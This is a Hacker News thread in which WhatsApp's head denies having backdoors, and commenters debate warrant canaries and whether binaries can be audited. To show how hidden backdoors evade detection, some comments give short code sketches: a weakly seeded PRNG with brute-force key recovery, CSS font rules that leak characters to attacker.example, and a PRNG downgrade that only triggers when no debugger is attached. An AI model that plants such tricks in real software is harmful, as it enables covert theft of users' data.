
We were surprised to read this story and are not aware of discussions that would force us to change our product.

We believe people have a fundamental right to have private conversations. End-to-end encryption protects that right for over a billion people every day.

We will always oppose government attempts to build backdoors because they would weaken the security of everyone who uses WhatsApp, including governments themselves. In times like these we must stand up both for the security and the privacy of our users everywhere. We will continue to do so.

Will, Head of WhatsApp




Will you have something like a warrant canary [1] to let users know in case there ever is a compromise of security?

[1] https://en.wikipedia.org/wiki/Warrant_canary


A warrant canary isn't proof of anything.


Can you add some substance to this? Why do you think warrant canaries are weak?


Warrant canaries haven't been tested in court. (They have been used as notification of an NSL, though.) In particular, judges are human beings, not robots, so the laws are interpreted and applied by humans. Because of that, removing a warrant canary toes the line of communicating with the affected party, in violation of an NSL. Thus removal of the canary most likely means an NSL was received, but the canary staying up doesn't necessarily mean that there wasn't an NSL. Lawyers at every organization have considered the situation and advised their clients, but those lawyers don't speak for the FBI.


I don't think you're meant to remove warrant canaries when you get a secret court order; you're just meant to keep renewing your warrant canary at a regular interval for as long as you don't get one.

My understanding is that they can prevent you from removing warrant canaries but they can't force you to continue announcing "I have not received a secret warrant".


Tactically, warrant canaries are dead-man switches. Conceptually, you can't compel someone to explicitly lie publicly.


But the FBI could advise the canary poster that not continuing to post the canary notice could lead to legal action (especially since that person has willfully put themselves into the situation). Then it would be up to the recipient of the NSL to decide if it’s worth that risk, which is, as stated above, untested. It’s a fine line between telling them to lie and telling them the ruse could be in violation of the gag order.


Conceptually you can't, because as a citizen you can attach to the canary any requirement that the law can't compel you to perform. For example, you can pay to publish the canary: the state can't compel you to spend money on it. Or you can tie a small, petty offense to it (say, an IP violation).

In places where there are limits to what the government can do to you, it's possible to resist.


Why are you arguing about what is conceptually possible? The reality is that people can absolutely be compelled to lie in public, especially for "national security" reasons. It happens all the time. Failing to update could signal something, but continuing to update means nothing. "Resistance" and other such concepts don't hold up to scrutiny against shareholders and 40-year sentences.


“Compelled Speech” has been tested in the Supreme Court.

EX: https://en.m.wikipedia.org/wiki/West_Virginia_State_Board_of...

The US government can’t legally compel you to lie, but may restrict what you can say.


Because thinking otherwise is saying that nothing really matters, the government can do anything at any time and you are toast no matter what.


The truth is in the middle for all nations on this earth. Adopting reality as a context is not nihilism.


Well... that might be true. In the words of George Orwell: https://www.youtube.com/watch?v=iP3T5tEs7yI


Welcome to the real world, kid. Population: all of us damned souls.


The constitutionality of whether the US Government can force someone to update a warrant canary has never been tested. Until it is, it’s foolish to declare with certainty whether it is or is not legal. We can only speculate at best.

We know that the legal bar for forcing someone to speak or not speak is high (compelling state interest), but national security has usually been held to pass such a bar.


If you can be compelled to be silent while breaking constitutional guidelines on the basis of national security, you can be compelled to update a beacon.

Warrant canaries are nice to have, but viewing them as something which provides proof of absence of government meddling is incorrect.


Perhaps, but that legal theory has never been tested in US federal court (as far as we know). It's entirely possible that the judicial branch wouldn't allow the executive branch to force private citizens into actively making false statements.


Right. My whole point is that there are unknowns in the equation which render the proposition void.


A lack of one is.


I've often wondered whether or not a sufficiently well worded warrant could require that the warrant canary remains published unchanged, rendering the warrant canary useless.


The idea behind the canaries is that they expire, and that one cannot legally force someone to sign false statements. So if no new canary is published when the old one expires, that's a red flag.
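
To make the mechanism concrete, here's a minimal sketch of that expiring-canary check (the 30-day interval and date format are made up for illustration, not any real provider's scheme); the point is that a stale or missing statement, rather than a removed one, is the signal:

    # Minimal canary-freshness check (illustrative only; the statement's
    # signature would also be verified against the publisher's PGP key).
    import datetime

    CANARY_MAX_AGE_DAYS = 30  # publisher promises a fresh statement at least this often

    def canary_is_fresh(signed_date, today=None):
        # True if the most recent signed canary statement is recent enough.
        today = today or datetime.date.today()
        published = datetime.date.fromisoformat(signed_date)
        return (today - published).days <= CANARY_MAX_AGE_DAYS

    print(canary_is_fresh("2019-09-15", datetime.date(2019, 10, 1)))  # True
    print(canary_is_fresh("2019-08-01", datetime.date(2019, 10, 1)))  # False -> red flag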


Please. A receipt for a $10 wrench and any IT guy will crumble.

That wouldn’t even be illegal, since they never hit you with a wrench - you just imagined they were about to go xkcd on you


If so, sounds like someone from FB Legal and the SEC should have Words with Bloomberg. Wouldn't be the first time they've intentionally maliciously misrepresented/lied about an infosec issue to the detriment of a company in order to move the market (Supermicro "grain of rice"...)


Looks like more crappy security reporting from Bloomberg: https://twitter.com/alexstamos/status/1178308065268920320


If you read the (short) story to the end, you will see it was first reported by the New York Times.


The reporting is accurate.


"are not aware of discussions that would force us to change our product."

It reads like your product is already compatible with govt eavesdropping


Ha, at first I thought you were making a joke that WhatsApp could have been aware of the conversations by ... eavesdropping on the government employees who are using WhatsApp.


Reminds me of the timeless http://bash.org/?88575


Do you currently have any backdoors installed?


We do not.

You don't have to take our word on this -- I wouldn't want you to. As others on this thread have pointed out it's possible enough to tear through our binaries that if we did have a backdoor it would be discovered.


> it's possible enough to tear through our binaries

No, it's not "possible enough" and I strongly suspect you fully realize that.

A backdoor doesn't need to be in a form of an IF statement or something comparably obvious and silly. It can be a weakly seeded PRNG that would allow a "determined party" to brute-force the key exchange in a reasonable time. That would take man-years to fish out from a binary, and that's without considering that you may (be forced to) distribute an altered binary on demand and to specific targets only.
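
As a toy illustration of how subtle that can be (purely hypothetical, not a claim about anything in WhatsApp's actual code): if key material comes from a PRNG seeded with something guessable like a coarse timestamp, anyone who knows the rough send time can re-derive the key by enumerating seeds, and nothing about it looks like an obvious IF statement in a disassembly:

    # Toy sketch of a weakly seeded PRNG "backdoor" (hypothetical).
    import random

    def weak_session_key(timestamp):
        # Key material derived from a PRNG whose seed is just a unix timestamp.
        rng = random.Random(timestamp)
        return bytes(rng.getrandbits(8) for _ in range(32))

    def recover_key(looks_valid, day_start):
        # Attacker brute-forces every one-second seed in a known one-day window.
        for t in range(day_start, day_start + 86400):
            candidate = weak_session_key(t)
            if looks_valid(candidate):  # e.g. trial-decrypt and check the padding
                return candidate
        return None

    # Demo: the attacker recovers the "secret" key just by enumerating seeds.
    secret = weak_session_key(1569888000)
    print(recover_key(lambda k: k == secret, 1569888000 - 3600) == secret)  # True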

So in the end all we have - realistically - is in fact just your word. There's no way for you to prove that you are trustworthy by pointing at some random binary. The only option is to distribute reproducible builds from an audited open source.


Distributing an altered binary to specific targets should be impossible, as WhatsApp doesn't control the distribution; Apple and Google do. They would also have to be complicit for a targeted attack to be feasible. By having to distribute the same binary to everyone, it is much harder to conceal a backdoor.


Are you sure that there's no way for WhatsApp to download and execute some code which would lead to the upload of protected information?

Simple example: I'm sure the WhatsApp main window is a webview. Imagine that the application loads some kind of resource (e.g. CSS) from the WhatsApp server. Now the server can serve slightly altered CSS that leaks secret data via custom fonts, etc., and you won't be able to detect that unless you're intercepting all traffic and can decrypt it (and apps nowadays love to pin certificates).

This is an imaginary attack; I have no idea whether WhatsApp does that. But HTML is a powerful and dangerous beast, yet it's used a lot in applications for rich media.
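
For the curious, the generic version of that font trick looks roughly like the sketch below (a well-known CSS exfiltration technique, not something observed in WhatsApp; attacker.example is a placeholder): each @font-face rule covers one character, and the browser only fetches the font URLs for characters that actually get rendered, so the pattern of requests leaks the content.

    # Generates illustrative exfiltration CSS (hypothetical, for discussion only).
    def exfil_css(charset="0123456789abcdef"):
        # One @font-face rule per character; a fetch of its src URL reveals
        # that the character was rendered inside the targeted element.
        rules = []
        for ch in charset:
            cp = ord(ch)
            rules.append(
                "@font-face { font-family: leak; "
                "src: url(https://attacker.example/f?c=%d); "
                "unicode-range: U+%04X; }" % (cp, cp)
            )
        rules.append(".secret { font-family: leak, sans-serif; }")
        return "\n".join(rules)

    print(exfil_css())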


That doesn't help against attacks by US authorities. If they can make Facebook create a backdoor, they can make Apple and Google distribute it.

Signal has the same issue.


Juniper revealed the ScreenOS backdoor with a quiet patch over Christmas. Within a month the backdoor was fully understood.


They had a diff, so they knew where it was. This helps a lot.


I disagree that it would take man-years to fish that out from a binary. Black hat and white hat hackers do this all the time.


I agree. The crypto used is industry standard, and the actual process all the way from random number generation to deriving a key is relatively easy to follow.

Active ways to attack the client to make it leak the key are far more worrying - but even an open source project wouldn't protect against that.


Again, it may very well be vanilla TLS, but then you have a bit of code in some obscure corner that repoints random() to an alternative, weaker implementation when certain conditions are met: for example, not being run under a debugger and not having certain popular functions trampolined.

Good luck finding even that without a fine-tooth comb. And that's us just getting started with code-flow obfuscation.
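
A deliberately crude Python rendering of that idea (hypothetical; a real implementation would be natively compiled and buried behind obfuscation, but the shape is the same):

    # Hypothetical conditional downgrade: only misbehave when nobody is watching.
    import random
    import sys

    def get_rng():
        being_debugged = sys.gettrace() is not None  # crude "am I being inspected?" check
        if being_debugged:
            return random.SystemRandom()  # honest CSPRNG while under observation
        return random.Random(42)          # fixed-seed PRNG the rest of the time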

No source = no trust. It's as simple as that.


Unfortunately, the WhatsApp terms of service say you must not "reverse engineer, alter, modify, create derivative works from, decompile, or extract code from our Services"


In (at least) the US this wouldn't hold up in court if they went after you: https://cr.yp.to/softwarelaw.html.

Of course, if WhatsApp detects an abnormal or tampered version of the app, they can suspend or disable your account. Security labs that do reverse engineering of this sort presumably do it on test handsets with burner numbers and identities, so it wouldn't affect any personal accounts they use.


Perhaps, I just thought it was an odd thing for the head of WhatsApp to say: You don't have to take our word on this - just do this thing that we prohibit in our terms of service.


Whatsapp is owned by Facebook. Facebook has never been a leader in corporate governance, or even solid moral decision-making.


This should be completely believable for a company that relies heavily on user and community trust.

That said, @wcathcart: in a community with deep technical expertise like Hacker News, folks do consider how many possible channels and means there are to covertly leak information from applications.

You're correct that in the general case it's likely that tech-savvy users would scan a popular app like yours and find any 'obviously-placed' backdoors. It's an observational and opportunistic approach, akin to the way a passer-by might spot a poorly locked bicycle on a street.

Unfortunately there's an extra level of complexity here - any app may have unusual behaviors that a sophisticated attacker could trigger against individual users to exploit them - and it's really, really hard for the security-conscious among us -- who might never see or meet those users -- to truly trust that your app is doing what you tell us it is, whether that's end-to-end encryption in all situations, or anything else.

The reason is that without being able to see how the app is written, verify that it's genuinely the same compiled version running on all devices, and audit the behavior it will have under exceptional circumstances -- external observers just don't know.
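
Concretely, "the same compiled version" would mean a check like the sketch below, assuming reproducible builds existed for the client (they currently don't, and the filenames are invented): rebuild from audited source and compare the hash against what the store shipped to your device.

    # Sketch of verifying a reproducible build (hypothetical filenames).
    import hashlib

    def sha256_of(path):
        # Stream the file so large APKs don't need to fit in memory.
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):
                h.update(chunk)
        return h.hexdigest()

    device = sha256_of("whatsapp-from-device.apk")
    rebuilt = sha256_of("whatsapp-rebuilt-from-source.apk")
    print("match" if device == rebuilt else "MISMATCH - investigate")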

I'm not expecting you to make the source freely available, incredible though that would be - but I'm attempting to explain the potential disconnect in dialogue you might find with some commenters.


I'm not sure whether this has been answered before, but why do you refuse to open-source the client app? As you say yourself, you try to have no secrets on the client side, encryption is supposed to be e2e, the technology is well known and implemented in many alternatives, and basically there seems to be nothing to protect in the app itself.


Please implement a warrant canary while you still can, before you are legally compelled not to.


> tear through our binaries

That's explicitly against your terms of service.


We now have explicit, written authorization from the head of WhatsApp to reverse engineer ("tear through") the binaries. The ToS only prohibits unauthorized reverse engineering. I agree with you that it was disallowed prior to this comment, but I think it's OK now.


Thanks for your words, but unfortunately I think your hands are tied on this one. Australia was the first pin to fall within the Five Eyes, and I think the rest will soon follow.


Is it true for the US or for every country? How does WhatsApp legally operate in Russia?


It's true in every country. We are a global service, and our policy on backdoors is the same everywhere: we do not have them and we vigorously oppose them.

Sometimes this leads to us being blocked. We were blocked in Brazil, for example, but that block was overturned in the courts.


Thanks! What is your opinion on the rumor that the FSB doesn’t have any complaints because they found an unintentional/unknown vulnerability that allows them to read WhatsApp messages? Should WhatsApp users be concerned about that?


We do know that phones and tablets are vulnerable - so it's not as if there couldn't be a backdoor elsewhere that may also be used to subvert WhatsApp.

It'd indeed be interesting to know if the FSB had some kind of baseband vulnerability that they'd used willy-nilly to facilitate dragnet surveillance.

I suspect William Binney was right though - blanket surveillance is just expensive and hides your needles in a mountain of hay; you really want high quality in the data you store in order to ease extraction of meaningful information / intelligence.

(that's not to say that aggregate meta data isn't interesting - just that with actual content noise is a problem)


So are you saying the backdoors will or won't be introduced to WhatsApp?


Will not. We are completely opposed to this. Backdoors are a horrible idea, and any government that suggests them is proposing to weaken the security and privacy of everyone.


Will you pull out of the UK and US? That seems very unrealistic. You have no choice but to obey the law, even if the law is ridiculous.

Have you considered architectural changes that will allow for the app to be compiled and deployed by an affiliate corp outside of these jurisdictions?


Thanks for the clarity.

So will WhatsApp refuse to comply, if this goes forward?

And is that even possible?

I do appreciate that Facebook has the resources to fight. To fight an NSL, even. But IANAL, and have no clue.


Facebook gives the government this, and the government enacts regulations to “protect” Facebook. I’m sure Facebook is salivating at the thought of getting even more access to your sensitive data. Once the backdoor is installed, who knows who’ll have access.


Thanks.


As much as I would like to believe all promises coming from corporate execs, Facebook has been caught lying more than enough. So thanks for trying, but I have uninstalled WhatsApp and I'm happy with Threema.


Have you considered Riot (Matrix) or Signal? Both are open source so it's possible to verify claims made on their website, which is a lot less possible with proprietary software like Threema.


And with Matrix apps you can choose to run your own server. Not sure what legal ramifications that has, but practically speaking it allows the possibility of eliminating another potential weakness.


... but probably opening many new ones, unless one has a really strong security team in place.


These vulnerabilities would then at least be bespoke, particular to a specific server, preventing mass surveillance. At least if you're not talking about potential vulnerabilities in synapse (Matrix server software), but then a strong security team wouldn't help that much.


And? That is what you feel. What guarantees do we have?


Glad you have the backs of the people when the Government doesn't.


>people have the fundamental right to have private conversations

Any comment on this?

https://www.theguardian.com/world/2013/sep/11/nsa-americans-...



